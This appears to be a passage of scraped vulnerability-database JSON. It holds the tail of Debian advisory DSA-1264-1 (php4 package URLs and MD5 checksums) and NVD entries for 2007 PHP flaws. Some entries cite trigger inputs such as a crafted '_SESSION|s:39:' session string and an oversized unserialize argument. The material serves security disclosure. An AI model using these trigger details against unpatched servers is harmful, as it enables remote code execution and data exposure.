http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_i386.deb\n Size/MD5 checksum: 19958 9cd9bd8707c8b781e9196311f031ec02\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_i386.deb\n Size/MD5 checksum: 17672 4b6d7c1eca69b9b218617ac243fa08ad\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_i386.deb\n Size/MD5 checksum: 8036 d2efa8096dc22d3c83f8095bb1ab4041\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_i386.deb\n Size/MD5 checksum: 21218 042bca1661b147c7be77a69936793904\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_i386.deb\n Size/MD5 checksum: 27138 7bbf0a0bd2aee657573d7174f32f1ae7\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_i386.deb\n Size/MD5 checksum: 7704 449baf33502b9f48c083dc4b338979dd\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_i386.deb\n Size/MD5 checksum: 13152 e1843d982173596abed784d8e7afcafa\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_i386.deb\n Size/MD5 checksum: 21382 629931e8d3024d1905071ec9dca9142b\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_i386.deb\n Size/MD5 checksum: 16400 d58ba81b22439e5285d448c4316bf5f0\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_ia64.deb\n Size/MD5 checksum: 1952256 b11fa1724bd55829b353525d564e47cc\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_ia64.deb\n Size/MD5 checksum: 1949710 aa0d4ee3995c997f265c272bc0445e1d\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_ia64.deb\n Size/MD5 checksum: 3895870 c29d60863e2331e919339626831fb5a4\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_ia64.deb\n Size/MD5 checksum: 1950132 2a7611e476d2afd7f5564e7f4cafac3a\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_ia64.deb\n Size/MD5 checksum: 168224 f3c570f637fb69b0d55dbdaaaf882c53\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_ia64.deb\n Size/MD5 checksum: 22028 f51f4140ef5d8de1db90bfe06d92d8b8\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_ia64.deb\n Size/MD5 checksum: 325338 41a5b1ff824be8410e94d5d3f4eaab5c\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_ia64.deb\n Size/MD5 checksum: 50644 a1f0f2f91dfbf84d24446e455e4d0d7c\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_ia64.deb\n Size/MD5 checksum: 45256 45155a527b60ebcd117901fc86390d67\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_ia64.deb\n Size/MD5 checksum: 48280 cea938e0b3829eeb344939c6116a3274\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_ia64.deb\n Size/MD5 checksum: 27042 fc2b4d3e1ae91076548568d8c922037f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_ia64.deb\n Size/MD5 checksum: 22658 f0f5301aa72e4e4ad61bdf90e6594de2\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_ia64.deb\n Size/MD5 checksum: 9334 a5c9f81e2bd6bc5ee4c86f5e4d1a0cd1\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_ia64.deb\n Size/MD5 checksum: 27602 89ecb1e38d742cff328580cdfe78b8f1\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_ia64.deb\n Size/MD5 checksum: 36192 49054c542a4534c12894bfefaf0db1eb\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_ia64.deb\n Size/MD5 checksum: 9012 d4db9ef8429729ab3051501004082c99\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_ia64.deb\n Size/MD5 checksum: 16338 d614825738a19af8ad2500b7c048b51b\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_ia64.deb\n Size/MD5 checksum: 28878 6d5df675a23f641f3e1dc5656db9e18a\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_ia64.deb\n Size/MD5 checksum: 21912 e76f15111a9b4ccdd94e1f7eac74b088\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_m68k.deb\n Size/MD5 checksum: 1580014 f45532aa9784f98ff1525bb005c76b30\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_m68k.deb\n Size/MD5 checksum: 1578768 71e652061d4867e6520d448b695f59f7\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_m68k.deb\n Size/MD5 checksum: 3080886 6131fe6ae47c2585775714cc64f2b34e\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_m68k.deb\n Size/MD5 checksum: 1551076 4aef3676854e4ace8e79d0b740109acd\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_m68k.deb\n Size/MD5 checksum: 168268 46923171263033b7d10a73c165baa849\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_m68k.deb\n Size/MD5 checksum: 18322 38c451535b6cd68a0e685c4df93cb01e\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_m68k.deb\n Size/MD5 checksum: 325808 dd492a00a1d27fa02f2b60e6a481d753\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_m68k.deb\n Size/MD5 checksum: 36516 d96b45bb5edaf8edd2282180639ddde8\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_m68k.deb\n Size/MD5 checksum: 31006 5647045aff47fb945f5ad2f148e4aede\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_m68k.deb\n Size/MD5 checksum: 34926 a7fecf002a308ed790931ecc849f379c\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_m68k.deb\n Size/MD5 checksum: 19126 8cd11ec89d611be7674b5117bd48545a\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_m68k.deb\n Size/MD5 checksum: 17820 d4e6de681e37bae511f04d4a3aa5bb2f\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_m68k.deb\n Size/MD5 checksum: 7964 06ac2494cd27c91d06f40592bdde7871\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_m68k.deb\n Size/MD5 checksum: 20694 b290e22f889af582bedf953d3b5e63a2\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_m68k.deb\n Size/MD5 checksum: 25852 be18d00b30fbca8ee6f6d9f31c9912b4\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_m68k.deb\n Size/MD5 checksum: 7682 7fd30edd98afff26bb2d0fedc5556ac8\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_m68k.deb\n Size/MD5 checksum: 12708 f95ada3a476fda3ea9bb36a263dfc19e\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_m68k.deb\n Size/MD5 checksum: 20376 6a0f683bd56800a86976d17cf0f90438\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_m68k.deb\n Size/MD5 checksum: 15878 4d8a9a99d92b68a7c29f9e4eb48e6c28\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_mips.deb\n Size/MD5 checksum: 1648626 c09ff318909ac3ec198cf8adb32c3e73\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_mips.deb\n Size/MD5 checksum: 1646678 8adf0e0321dad42a4a33278b54c1d78a\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_mips.deb\n Size/MD5 checksum: 3295802 61b55383a87aaecf5825679502a2cd94\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_mips.deb\n Size/MD5 checksum: 1652658 c094e3ff43dca52eecd39d3d393003f9\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_mips.deb\n Size/MD5 checksum: 168214 a85518eecd34caeb8b155741fbba6db2\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_mips.deb\n Size/MD5 checksum: 16826 79bb3b43b38eba4b9cfaed68939fb1ad\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_mips.deb\n Size/MD5 checksum: 325308 eab0cd699328a69b4f3ef88481985d6c\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_mips.deb\n Size/MD5 checksum: 35228 de389e3122cd99882eeeaca2fc7b70a3\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_mips.deb\n Size/MD5 checksum: 31938 87dea075793ed76b812a81963c913aef\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_mips.deb\n Size/MD5 checksum: 34012 e535078c682091dac1a46f2fb4c0e7c4\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_mips.deb\n Size/MD5 checksum: 19922 5fe0bc6ac5386626273ae6ee2e66215b\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_mips.deb\n Size/MD5 checksum: 16476 372a59ba3934e84bb106896a06a03a11\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_mips.deb\n Size/MD5 checksum: 8120 2b6f78e9419969fdc3ce80bc14d85560\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_mips.deb\n Size/MD5 checksum: 20504 0ce56458633d1e77f528d4f9b968ce13\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_mips.deb\n Size/MD5 checksum: 26370 3b393309a1ddb3a67a6018496ca29e6b\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_mips.deb\n Size/MD5 checksum: 7824 fa7930366a56bb94deaffe6440e94822\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_mips.deb\n Size/MD5 checksum: 13154 243bf42c3fdd1db4f402de11750c9171\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_mips.deb\n Size/MD5 checksum: 21654 cd359bf978b6ea51e6eb65a37b60278f\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_mips.deb\n Size/MD5 checksum: 16188 d4ebc66b677efe3b82a163b62c29aa35\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 1630640 210a7f2df10febfaa52f2447520df140\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 1628878 17b584a9e468eb8ede205a2a6878f4b1\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 3254494 b9a460244d857a77f0d2fc5c1b91894f\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 1631616 370c7e8cb963ec8f95049dbf5675fe4a\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 168228 ff3e221bfb5b79f12c10ebd815d88b29\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 16794 7d960cc9d3e3d362d0f4dba0497eb5b7\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 325308 f14f5986aa26436d2c6d81707b9987d8\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 34774 f4f195f0914c0bc882b5143c479c5d24\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 31666 9f6063fcb54d5379b997ccbc982f65f2\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 33894 da46922024a02d1023b521cc076cb9cb\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 19800 b86f23fe9c0c7ec4b56c2f767693835f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 16384 3e98c62e74e0523e224ad665e604eb78\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 8092 2ab07f4176f45cbd6a74fbccdb72e9b9\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 20448 61b72f3ff7cbdec0c7bcf644ae7a42e4\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 26244 d38dfaa8d7a2565b38edf485c9692212\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 7778 0aba913f072a2ab411f7f36408838041\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 13054 2b4f2d929c4a9e8d7aafc439b6a6b4b4\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 21598 6691aed3e3879ce3884c31bc0c60ae4f\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_mipsel.deb\n Size/MD5 checksum: 16166 696aa9954b611596fa02b92bb15914d3\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 1661280 abad22f7719712b40a4af68503551e21\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 1659466 4997003d5edddb161c931ed7f47cfe0a\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 3281422 f4bdbbaac2e032788c26bb92dc0da376\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 1646784 d84ff6b16873412f6af326995e09ab54\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 168220 3f03b4edeffcd89c5cc4127d3a4602ac\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 19638 1c874990ecb283c1b23950b016485b50\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 325264 15b8a3d2cde40c4aaf31d1925189ab3b\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 38646 3945c96a6cd13120e293f60ae820d6d0\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 34516 b44d4867447c01db49fe5a9c8e538015\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 37770 8fffcc151a281269cccb29559f0b90fc\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 21412 9a9663537ca1997bc62cfa4494eba8f3\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 19728 9bb25b04bec25cee082c8a8e81c4a19d\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 9578 d1bd238a89be2838f5b37d5b2b2a9053\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 22604 2935a012ecd74195f44e2213c9999c7a\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 28686 46bb5b9d2b6e4258fe2b8dc130ae817c\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 9286 2282aefc94808ac2ea1490ecb3ea357f\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 14960 68716f24414748d9e621c7f4b0a8e2ea\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 23038 193ae7cc97bc2ce1c7033cc14cd6c9c9\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_powerpc.deb\n Size/MD5 checksum: 18268 1b032bee509fb88ce36d481c4335418a\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_s390.deb\n Size/MD5 checksum: 1709576 c521d1761395fa41e785906cd052a240\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_s390.deb\n Size/MD5 checksum: 1708618 cbea3ff2f1f8b42c91f8d1ebe6f295a1\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_s390.deb\n Size/MD5 checksum: 3360294 a642ef581d1decdd6b330f2ca62aa3a8\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_s390.deb\n Size/MD5 checksum: 1687438 0a16abfb5e945795b598e06fe78821bd\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_s390.deb\n Size/MD5 checksum: 168202 088f381bf8f67c76e6a636b1a7420709\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_s390.deb\n Size/MD5 checksum: 17842 6f628c4ba64fe7c3e6d1958d8887a032\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_s390.deb\n Size/MD5 checksum: 325188 84155d21cc204dd029cb6fe724fd700e\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_s390.deb\n Size/MD5 checksum: 41124 f159880550b5c238b0f9cd357763e120\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_s390.deb\n Size/MD5 checksum: 33564 560a9717ec712e71a9608ee808017f93\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_s390.deb\n Size/MD5 checksum: 37530 58332a689abe020d696accb2c4413bdc\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_s390.deb\n Size/MD5 checksum: 21410 8266344d677b30c00ee0575185808c7d\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_s390.deb\n Size/MD5 checksum: 17732 1d5a9cdcc554b886836392abacafb37a\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_s390.deb\n Size/MD5 checksum: 8394 bf5bfd48a6955ed04cf5eb43c0dbed80\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_s390.deb\n Size/MD5 checksum: 22938 558f6a81404ef0097f4d47ef41067acd\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_s390.deb\n Size/MD5 checksum: 28874 63b1580d76b438dfe3c6150fca0c983c\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_s390.deb\n Size/MD5 checksum: 8048 fb1993cc4170134b46d0a68496971992\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_s390.deb\n Size/MD5 checksum: 13894 eeee528a1872d8fd80f92c6459950216\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_s390.deb\n Size/MD5 checksum: 22276 ef4cc0b299f757599e7edd178cfbfa95\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_s390.deb\n Size/MD5 checksum: 17300 c2d98a377eff47a1fa6376d491378007\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_sparc.deb\n Size/MD5 checksum: 1623810 c451cd4693f5a69534681b1eba46e29d\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_sparc.deb\n Size/MD5 checksum: 1620886 6f450acb1570c2917c92af4e2ee3462b\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_sparc.deb\n Size/MD5 checksum: 3197912 c01cbc381a760f7439f8c8b24a8ee717\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_sparc.deb\n Size/MD5 checksum: 1606454 0f3be5c22bb512308e0c668b06e7f25b\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_sparc.deb\n Size/MD5 checksum: 168222 d4a0310401f3092a2ea57880bed9911d\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_sparc.deb\n Size/MD5 checksum: 18074 160821e02197baf3364906d17eabaa37\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_sparc.deb\n Size/MD5 checksum: 325276 b0c1759a579859033b410d34bf443162\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_sparc.deb\n Size/MD5 checksum: 36488 cb0f7a642bcc12fdcde900b179ad197f\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_sparc.deb\n Size/MD5 checksum: 31948 c31211a42a127e283cf05eea2acb3782\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_sparc.deb\n Size/MD5 checksum: 36246 ded59dffa2579d4f3f91be5bc465812e\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_sparc.deb\n Size/MD5 checksum: 19278 d852fc1b8146be87d789d46f3fd9531a\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_sparc.deb\n Size/MD5 checksum: 17488 c25a9f3959ad71717f22139ee5cc3964\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_sparc.deb\n Size/MD5 checksum: 7870 54ef2d007c15936eff7a0968c1bb8411\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_sparc.deb\n Size/MD5 checksum: 20672 3aa6f646c2d48e12f274844d882b4cb3\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_sparc.deb\n Size/MD5 checksum: 26540 db50bace36223a5fb3165012da864279\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_sparc.deb\n Size/MD5 checksum: 7594 a16c41b7273adaf2b72e2cd66a29d856\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_sparc.deb\n Size/MD5 checksum: 12846 5f44cba16d1c910b0336c221ab3db31b\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_sparc.deb\n Size/MD5 checksum: 20850 f84c554b5e0c31a276444953acdf0d5d\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_sparc.deb\n Size/MD5 checksum: 15866 56d9a2ad4d2d94150b7be7deefc6fbd0\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n", "modified": "2007-03-07T00:00:00", "published": "2007-03-07T00:00:00", "id": "DEBIAN:DSA-1264-1:CBFFE", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2007/msg00019.html", "title": "[SECURITY] [DSA 1264-1] New php4 packages fix several vulnerabilities", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:08:59", "bulletinFamily": "NVD", "description": "Buffer overflow in the imap_mail_compose function in PHP 5 before 5.2.1, and PHP 4 before 4.4.5, allows remote attackers to execute arbitrary code via a long boundary string in a type.parameters field. NOTE: as of 20070411, it appears that this issue might be subsumed by CVE-2007-0906.3.", "modified": "2018-10-30T16:25:00", "id": "CVE-2007-1825", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1825", "published": "2007-04-02T23:19:00", "title": "CVE-2007-1825", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "Unspecified vulnerability in PHP before 5.2.1 allows attackers to \"clobber\" certain super-global variables via unspecified vectors.", "modified": "2018-10-30T16:25:00", "id": "CVE-2007-0910", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0910", "published": "2007-02-13T23:28:00", "title": "CVE-2007-0910", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "Multiple buffer overflows in PHP before 5.2.1 allow attackers to cause a denial of service and possibly execute arbitrary code via unspecified vectors in the (1) session, (2) zip, (3) imap, and (4) sqlite extensions; (5) stream filters; and the (6) str_replace, (7) mail, (8) ibase_delete_user, (9) ibase_add_user, and (10) ibase_modify_user functions. NOTE: vector 6 might actually be an integer overflow (CVE-2007-1885). NOTE: as of 20070411, vector (3) might involve the imap_mail_compose function (CVE-2007-1825).", "modified": "2018-10-30T16:25:00", "id": "CVE-2007-0906", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0906", "published": "2007-02-13T23:28:00", "title": "CVE-2007-0906", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "Multiple format string vulnerabilities in PHP before 5.2.1 might allow attackers to execute arbitrary code via format string specifiers to (1) all of the *print functions on 64-bit systems, and (2) the odbc_result_all function.", "modified": "2018-10-30T16:25:00", "id": "CVE-2007-0909", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0909", "published": "2007-02-13T23:28:00", "title": "CVE-2007-0909", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "Buffer underflow in PHP before 5.2.1 allows attackers to cause a denial of service via unspecified vectors involving the sapi_header_op function.", "modified": "2018-10-30T16:25:00", "id": "CVE-2007-0907", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0907", "published": "2007-02-13T23:28:00", "title": "CVE-2007-0907", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "The WDDX deserializer in the wddx extension in PHP 5 before 5.2.1 and PHP 4 before 4.4.5 does not properly initialize the key_length variable for a numerical key, which allows context-dependent attackers to read stack memory via a wddxPacket element that contains a variable with a string name before a numerical variable.", "modified": "2018-10-30T16:26:00", "id": "CVE-2007-0908", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0908", "published": "2007-02-13T23:28:00", "title": "CVE-2007-0908", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-10T12:37:51", "bulletinFamily": "NVD", "description": "PHP 4 before 4.4.5, and PHP 5 before 5.2.1, when register_globals is enabled, allows context-dependent attackers to execute arbitrary code via deserialization of session data, which overwrites arbitrary global variables, as demonstrated by calling session_decode on a string beginning with \"_SESSION|s:39:\".\nSuccessful exploitation requires that variable \"register_globals\" is enabled.", "modified": "2019-10-09T22:52:00", "id": "CVE-2007-1701", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1701", "published": "2007-03-27T01:19:00", "title": "CVE-2007-1701", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "The php_binary serialization handler in the session extension in PHP before 4.4.5, and 5.x before 5.2.1, allows context-dependent attackers to obtain sensitive information (memory contents) via a serialized variable entry with a large length value, which triggers a buffer over-read.", "modified": "2018-10-30T16:25:00", "id": "CVE-2007-1380", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1380", "published": "2007-03-10T00:19:00", "title": "CVE-2007-1380", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-10-10T12:37:51", "bulletinFamily": "NVD", "description": "The zend_hash_init function in PHP 5 before 5.2.1 and PHP 4 before 4.4.5, when running on a 64-bit platform, allows context-dependent attackers to cause a denial of service (infinite loop) by unserializing certain integer expressions, which only cause 32-bit arguments to be used after the check for a negative value, as demonstrated by an \"a:2147483649:{\" argument.\nAvailability also affected by time out alarm for the script, which helps 